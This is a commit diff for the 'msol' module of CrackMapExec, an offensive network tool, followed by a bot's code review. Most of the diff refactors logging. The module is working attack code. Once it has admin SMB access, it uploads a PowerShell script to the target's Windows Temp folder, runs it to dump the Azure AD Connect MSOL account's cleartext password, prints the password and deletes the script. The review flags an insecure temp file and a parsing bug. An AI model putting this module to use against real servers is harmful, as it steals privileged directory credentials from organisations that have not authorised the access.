update msol module logging

main
Marshall Hallenbeck 2023-04-05 23:00:01 -04:00
parent 083550846a
commit edb85f382e
1 changed files with 50 additions and 41 deletions


@ -1,79 +1,88 @@
# MSOL module for CME # MSOL module for CME
# Author of the module : https://twitter.com/Daahtk # Author of the module : https://twitter.com/Daahtk
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/ # Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
from base64 import b64decode
from sys import exit from sys import exit
from os import path from os import path
from cme.helpers.powershell import get_ps_script
class CMEModule: class CMEModule:
name = "msol"
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
supported_protocols = ["smb"]
opsec_safe = True
multiple_hosts = True
name = 'msol' def __init__(self, context=None, module_options=None):
description = 'Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server' self.use_embedded = None
supported_protocols = ['smb'] self.MSOL_PS1 = None
opsec_safe = True self.msol_embedded = None
multiple_hosts = True self.cmd = None
self.msolmdl = None
self.msol = None
self.tmp_share = None
self.share = None
self.tmp_dir = None
self.context = context
self.module_options = module_options
def options(self, context, module_options): def options(self, context, module_options):
''' """
MSOL_PS1 // Path to the msol binary on your computer MSOL_PS1 // Path to the msol binary on your computer
''' """
self.tmp_dir = "C:\\Windows\\Temp\\"
self.share = "C$"
self.tmp_share = self.tmp_dir.split(":")[1]
self.msol = "msol.ps1"
self.use_embedded = True
self.msolmdl = self.cmd = ""
self.tmp_dir = "C:\\Windows\\Temp\\" with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc:
self.share = "C$" self.msol_embedded = msolsc.read()
self.tmp_share = self.tmp_dir.split(":")[1]
self.msol = "msol.ps1"
self.useembeded = True
self.msolmdl = self.cmd = ""
with open(get_ps_script('msol_dump/msol_dump.ps1'), 'r') as msolsc: if "MSOL_PS1" in module_options:
self.msol_embedded = msolsc.read() self.MSOL_PS1 = module_options["MSOL_PS1"]
self.use_embedded = False
if "MSOL_PS1" in module_options: def exec_script(self, _, connection):
self.MSOL_PS1 = module_options["MSOL_PS1"]
self.useembeded = False
def execscript(self, _, connection):
command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1" command = f"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe {self.tmp_dir}msol.ps1"
return connection.execute(command, True) return connection.execute(command, True)
def on_admin_login(self, context, connection):
if self.useembeded: def on_admin_login(self, context, connection):
if self.use_embedded:
file_to_upload = "/tmp/msol.ps1" file_to_upload = "/tmp/msol.ps1"
with open(file_to_upload, 'w') as msol: with open(file_to_upload, 'w') as msol:
msol.write(self.msol_embedded) msol.write(self.msol_embedded)
else: else:
if path.isfile(self.MSOL_PS1): if path.isfile(self.MSOL_PS1):
file_to_upload = self.MSOL_PS1 file_to_upload = self.MSOL_PS1
else: else:
context.log.error(f"Cannot open {self.MSOL_PS1}") context.log.fail(f"Cannot open {self.MSOL_PS1}")
exit(1) exit(1)
context.log.display(f"Uploading {self.msol}") context.log.display(f"Uploading {self.msol}")
with open(file_to_upload, 'rb') as msol: with open(file_to_upload, 'rb') as msol:
try: try:
connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read) connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", msol.read)
context.log.success(f"Msol script successfully uploaded") context.log.success(f"Msol script successfully uploaded")
except Exception as e: except Exception as e:
context.log.error(f"Error writing file to share {self.tmp_share}: {e}") context.log.fail(f"Error writing file to share {self.tmp_share}: {e}")
return return
try: try:
if self.cmd == "": if self.cmd == "":
context.log.display(f"Executing the script") context.log.display(f"Executing the script")
p = self.execscript(context, connection) p = self.exec_script(context, connection)
for line in p.splitlines(): for line in p.splitlines():
p1, p2 = line.split(" ", 1) p1, p2 = line.split(" ", 1)
context.log.highlight(f"{p1} {p2}") context.log.highlight(f"{p1} {p2}")
else : else:
context.log.error(f"Script Execution Impossible") context.log.fail(f"Script Execution Impossible")
except Exception as e: except Exception as e:
context.log.error(f"Error runing command: {e}") context.log.fail(f"Error running command: {e}")
finally: finally:
try: try:
connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}") connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.msol}")
context.log.success(f"Msol script successfully deleted") context.log.success(f"Msol script successfully deleted")
except Exception as e: except Exception as e:
context.log.error(f"Error deleting msol script on {self.share}: {e}") context.log.fail(f"[OPSEC] Error deleting msol script on {self.share}: {e}")
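Review bot: In `on_admin_login`, the embedded-script branch still writes to the fixed path `/tmp/msol.ps1` and reopens it for the upload, so on a shared workstation another local account can pre-create or replace that file (CWE-377) and the content pushed to the server is no longer guaranteed to be the embedded script; the local copy is also never removed. `self.msol_embedded` is already in memory, so the temp file can be dropped: `buf = io.BytesIO(self.msol_embedded.encode())` followed by `connection.conn.putFile(self.share, f"{self.tmp_share}{self.msol}", buf.read)`, with `import io` added at the top (or `tempfile.NamedTemporaryFile` if a real file is required). Separately, `p1, p2 = line.split(" ", 1)` raises ValueError on any output line without a space, which the broad `except` then reports as "Error running command" and hides the remaining output. The newly added `b64decode` import also appears unused in the visible code.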